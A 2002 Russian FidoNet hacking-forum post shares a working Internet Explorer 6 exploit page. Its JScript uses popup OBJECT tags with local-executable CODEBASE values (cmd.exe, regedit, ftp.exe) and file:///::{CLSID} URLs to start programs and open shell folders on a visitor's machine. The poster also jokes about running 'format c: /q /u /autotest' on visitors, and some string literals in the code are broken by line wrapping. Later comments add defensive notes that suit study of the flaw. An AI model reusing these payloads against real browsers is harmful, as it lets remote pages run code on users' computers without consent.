

ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Drone                                2:5020/1990.111 22 Feb 2002  16:02:00
 To : All
 Subject : Задолбали баги в IE6.0.
 -------------------------------------------------------------------------------- 
 
 
 Сабж... Вот еще один... Позволяет запускать любые файлы на компьютере юзера.
 У меня на WinXP + IE6.0 работает :(
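 Как насчет такого: заходишь на страничку, а тут тебе format c: /q /u /autotest
 выполняют :)
 [Прим.: код ниже запускает уже имеющиеся на диске программы по заданному пути и
 без параметров; в описании самой страницы передача параметров названа лишь
 возможной при сочетании с другими уязвимостями.]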
 
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <HTML><HEAD><TITLE>Extensibility Page</TITLE>
 <META http-equiv=Content-Type content="text/html; charset=windows-1251">
 <SCRIPT language=JScript>
 // Popup-based demos. One popup object is created when the script loads and is
 // reused by every open*() function in this script block.
 // window.createPopup() is an Internet Explorer-specific API.
 var oPopup = window.createPopup();
 
 // Demo of what the page text calls the "PopUp OBJECT tag bug".
 // Writes three OBJECT elements into the popup document and then shows the
 // popup. Every OBJECT carries the same all-ones CLASSID (presumably chosen
 // because no control is registered under it -- confirm) and a CODEBASE that
 // names a local executable instead of a download URL: c:/cmd.exe,
 // c:/winnt/system32/cmd.exe and c:/windows/explorer.exe. Several paths are
 // listed, presumably to cover different Windows install layouts.
 // Defensive takeaway: a CODEBASE that points at a local drive path in markup
 // served by a remote page is the anomaly to filter or alert on.
 // NOTE(review): the innerHTML string literal is wrapped across several lines
 // by the message format; as archived it is not a valid single JScript literal.
 function openPopupCMD()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/cmd.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/winnt/system32/cmd.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/windows/explorer.exe"></OBJECT>';
      // show(x, y, width, height, element): position is relative to document.body.
      oPopup.show(290, 190, 200, 200, document.body);
 }
 
 // Same popup/OBJECT pattern as the other popup demos, aimed at the registry
 // editor: two OBJECT elements with the all-ones CLASSID whose CODEBASE values
 // are c:/windows/Regedit.exe and c:/winnt/regedit.exe.
 // The function only assigns markup and shows the popup; any program launch
 // would be a side effect of how the affected browser handles that markup.
 // NOTE(review): the string literal is line-wrapped by the message format.
 function openRegedit()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/windows/Regedit.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/winnt/regedit.exe"></OBJECT>';
      oPopup.show(290, 190, 200, 200, document.body);
 }
 
 // Popup/OBJECT demo with a harmless target: the CODEBASE values name
 // c:/windows/calc.exe and c:/winnt/system32/calc.exe.
 // The CODEBASE attribute is used here with a local file path, whereas it
 // normally carries the URL a control is downloaded from.
 // NOTE(review): the string literal is line-wrapped by the message format.
 function openCalc()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/windows/calc.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/winnt/system32/calc.exe"></OBJECT>';
      oPopup.show(290, 190, 200, 200, document.body);
 }
 
 // Popup/OBJECT demo whose CODEBASE values name the command-line FTP client
 // at c:/windows/FTP.exe and c:/winnt/system32/FTP.exe.
 // No arguments are part of the CODEBASE values; only a program path is given.
 // NOTE(review): the string literal is line-wrapped by the message format.
 function openFTP()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/windows/FTP.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/winnt/system32/FTP.exe"></OBJECT>';
      oPopup.show(290, 190, 200, 200, document.body);
 }
 
 // Popup/OBJECT demo whose CODEBASE values name cleanmgr.exe under
 // c:/windows and c:/winnt/system32.
 // As in the other popup demos, the markup is injected through innerHTML into
 // the popup document rather than written into the main page.
 // NOTE(review): the string literal is line-wrapped by the message format.
 function openPopupCleanMGR()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/windows/cleanmgr.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/winnt/system32/cleanmgr.exe"></OBJECT>';
      oPopup.show(290, 190, 200, 200, document.body);
 }
 // Popup/OBJECT demo with four OBJECT elements whose CODEBASE values name
 // bundled games (two Pinball locations under Program Files, MSHEARTS.EXE and
 // winmine.exe).
 // NOTE(review): the message format wrapped the string literal, and two of the
 // breaks fall inside the "Program Files" path segment, so those CODEBASE
 // values are damaged as archived.
 function openGames()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program
 Files/Plus!/PINBALL.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/Program
 Files/Windows NT/Pinball/Pinball.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/windows/MSHEARTS.EXE"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="C:/winnt/system32/winmine.exe"></OBJECT>';
      oPopup.show(290, 190, 200, 200, document.body);
 }
 
 // Popup/OBJECT demo whose CODEBASE values name mspaint.exe under
 // c:/Program Files/Accessories and c:/winnt/system32.
 // NOTE(review): the string literal is line-wrapped by the message format; the
 // first break falls inside the "Program Files" path segment.
 function openPaint()
 {
 
     var oPopBody = oPopup.document.body;
      oPopBody.innerHTML = '<OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program
 Files/Accessories/mspaint.exe"></OBJECT><OBJECT NAME="X"
 CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
 CODEBASE="c:/winnt/system32/mspaint.exe"></OBJECT>';
      oPopup.show(290, 190, 200, 200, document.body);
 }
 </SCRIPT>
 
 <SCRIPT language=JScript>
 //BELOW file://::{CLSID} code
 
 // Opens a new window on a file:/// URL built from two shell-namespace CLSIDs
 // instead of a filesystem path; judging by the function name the target is
 // Control Panel. This is apparently the part the page text refers to as the
 // "directoryInfo" bug.
 // Defensive takeaway: web-origin content navigating to file: locations is a
 // zone crossing that should be refused for Internet-zone pages.
 // NOTE(review): the URL literal is split across two lines by the message
 // format (a space follows "3AEA-"), so it is not one valid literal as archived.
 function openControlPanel()
 {
 window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA- 
 1069-A2DD-08002B30309D}");
 }
 
 // Opens a new window on a three-level file:///::{CLSID} path; the first two
 // CLSIDs are the same as in openControlPanel() and the third presumably
 // selects the Fonts folder (per the function name -- confirm).
 // NOTE(review): the URL literal is line-wrapped by the message format.
 function openFonts()
 {
 window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA- 
 1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524152}");
 }
 
 // Opens a new window on a three-level file:///::{CLSID} path that differs
 // from openFonts() only in the last digit of the third CLSID; per the function
 // name the target is presumably the Administrative Tools folder.
 // NOTE(review): the URL literal is line-wrapped by the message format.
 function openAdminTools()
 {
 window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA- 
 1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524153}");
 }
 
 // Opens a new window on a two-level file:///::{CLSID} path; per the function
 // name the second CLSID presumably selects the Dial-Up Networking folder.
 // NOTE(review): the URL literal is line-wrapped by the message format.
 function openDialUpNetworking()
 {
 window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{992CFFA0-F557- 
 101A-88EC-00DD010CCC48}");
 }
 
 // Opens a new window on a single file:///::{CLSID} location; per the function
 // name the CLSID presumably identifies the Network Neighborhood folder.
 // Exposure here is browsing a local shell folder from remote-origin script,
 // not launching a program.
 function openNetworkNeighborhood()
 {
 window.open("file:///::{208D2C60-3AEA-1069-A2D7-08002B30309D}");
 }
 
 // Opens a new window on a two-level file:///::{CLSID} path; per the function
 // name the second CLSID presumably selects the scheduled Tasks folder.
 // NOTE(review): the URL literal is line-wrapped by the message format.
 function openTasks()
 {
 window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{D6277990-4C6A- 
 11CF-8D87-00AA0060F5BF}");
 }
 
 // Opens a new window on a single file:///::{CLSID} location; per the function
 // name the CLSID presumably identifies the Recycle Bin.
 function openRecycleBin()
 {
 window.open("file:///::{645FF040-5081-101B-9F08-00AA002F954E}");
 }
 
 // Opens a new window on a single file:///::{CLSID}/ location (note the
 // trailing slash, which the other single-CLSID demos do not have); per the
 // function name the CLSID presumably identifies the My Documents folder.
 function openMyDocuments()
 {
 window.open("file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/");
 }
 
 </SCRIPT>
 
 <META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
 <BODY>
 <H1>Internet Explorer Fun Run Page</H1>
 <P>[For Internet Explorer 6 with updates q312361,q240308, and q313675, possibly 
 earlier versions.]</P>
 <P>Click your mouse over the words below and have some fun seeing what remote
 website authors can run on your system at their convenience. While this is
 amusing and startling, with a few loops it could cause a bit of a catastrophe on
 your system. Combined with other exploits: force fed trojans could be run;
 possibly command parameters run; or directory traversal (client side) exploits. 
 I have included demonstrations here of the PopUp OBJECT tag bug as well as the
 "directoryInfo" bug because they have similar results and combine to paint an
 interesting picture. <BR>Be sure and clean out your "Downloaded Program Files"
 directory when done. <BR>Note: File paths made for Windows 2000 and Windows ME. 
 </P><BR><BR>Pop-Up Exploit Stuff - Click on the Words
 Below<BR>_________________________________________
 <P onclick=openPopupCMD();><U><FONT color=#3333ff>Command</FONT></U></P>
 <P onclick=openRegedit()><U><FONT color=#3333ff>Regedit</FONT></U></P>
 <P onclick=openCalc()><U><FONT color=#3333ff>Calculator</FONT></U></P>
 <P onclick=openFTP()><U><FONT color=#3333ff>FTP</FONT></U></P>
 <P onclick=openPopupCleanMGR()><U><FONT
 color=#3333ff>CleanManager</FONT></U></P>
 <P onclick=openGames()><U><FONT color=#3333ff>Games</FONT></U></P>
 <P onclick=openPaint()><U><FONT color=#3333ff>Paint</FONT></U></P>File:{CLSID}
 Stuff - Click on the Words Below<BR>_________________________________________
 <P onclick=openControlPanel()><U><FONT color=#3333ff>Control
 Panel</FONT></U></P>
 <P onclick=openFonts()><U><FONT color=#3333ff>Fonts</FONT></U></P>
 <P onclick=openAdminTools()><U><FONT color=#3333ff>Admin Tools</FONT></U></P>
 <P onclick=openDialUpNetworking()><U><FONT color=#3333ff>Dial Up
 Networking</FONT></U></P>
 <P onclick=openNetworkNeighborhood()><U><FONT color=#3333ff>Network
 Neighborhood</FONT></U></P>
 <P onclick=openTasks()><U><FONT color=#3333ff>Tasks</FONT></U></P>
 <P onclick=openRecycleBin()><U><FONT color=#3333ff>Recycle Bin</FONT></U></P>
 <P onclick=openMyDocuments()><U><FONT color=#3333ff>My
 Documents</FONT></U></P><BR><BR><BR></BODY></HTML>
 
 °±ІЫ  С уважением, Андрей Ковалев  ЫІ±°
 Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет...
 --- [Mo.Nashe.Radio] [Mo.Mesi] [http://drone.nm.ru] [http://www.funmp3.tk]
  * Origin: E-mail: drone[at]igromania.ru  ICQ:117846611 (2:5020/1990.111)
 
 


 Тема:    Автор:    Дата:  
 Задолбали баги в IE6.0.   Drone   22 Feb 2002 16:02:00 
 Задолбали баги в IE6.0.   Viktor I. Kovshik   24 Feb 2002 08:38:22 
 Re: Задолбали баги в IE6.0.   Andrew Noga   11 Feb 2002 10:20:25 
 Re: Задолбали баги в IE6.0.   Ruslan Tebuev   24 Feb 2002 12:32:15 
 Re: Задолбали баги в IE6.0.   Drone   26 Feb 2002 14:22:00 
 Re: Задолбали баги в IE6.0.   Ruslan Tebuev   03 Mar 2002 10:39:31 